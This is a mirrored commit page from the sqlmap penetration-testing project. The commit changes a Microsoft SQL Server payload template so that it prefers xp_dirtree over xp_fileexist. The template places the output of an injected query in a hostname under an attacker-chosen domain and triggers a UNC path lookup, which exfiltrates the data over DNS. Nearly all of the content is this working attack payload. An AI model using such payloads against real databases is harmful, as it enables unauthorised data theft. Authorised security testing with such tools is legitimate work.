mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-25 17:55:49 +01:00
Prefer xp_dirtree
This commit is contained in:
parent
098c7c06dd
commit
c051d7fecc
1 changed files with 2 additions and 2 deletions
|
|
@ -1,4 +1,4 @@
|
|||
DECLARE @host varchar(1024);
|
||||
SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%.%DOMAIN%';
|
||||
EXEC('xp_fileexist "\\' + @host + '\%PREFIX%%SUFFIX%"');
|
||||
# or EXEC('xp_dirtree "\\' + @host + '."');
|
||||
EXEC('master..xp_dirtree "\\' + @host + '\%PREFIX%%SUFFIX%"')
|
||||
# or EXEC('master..xp_fileexist "\\' + @host + '\%PREFIX%%SUFFIX%"')
|
||||
|
|
|
|||
Loading…
Reference in a new issue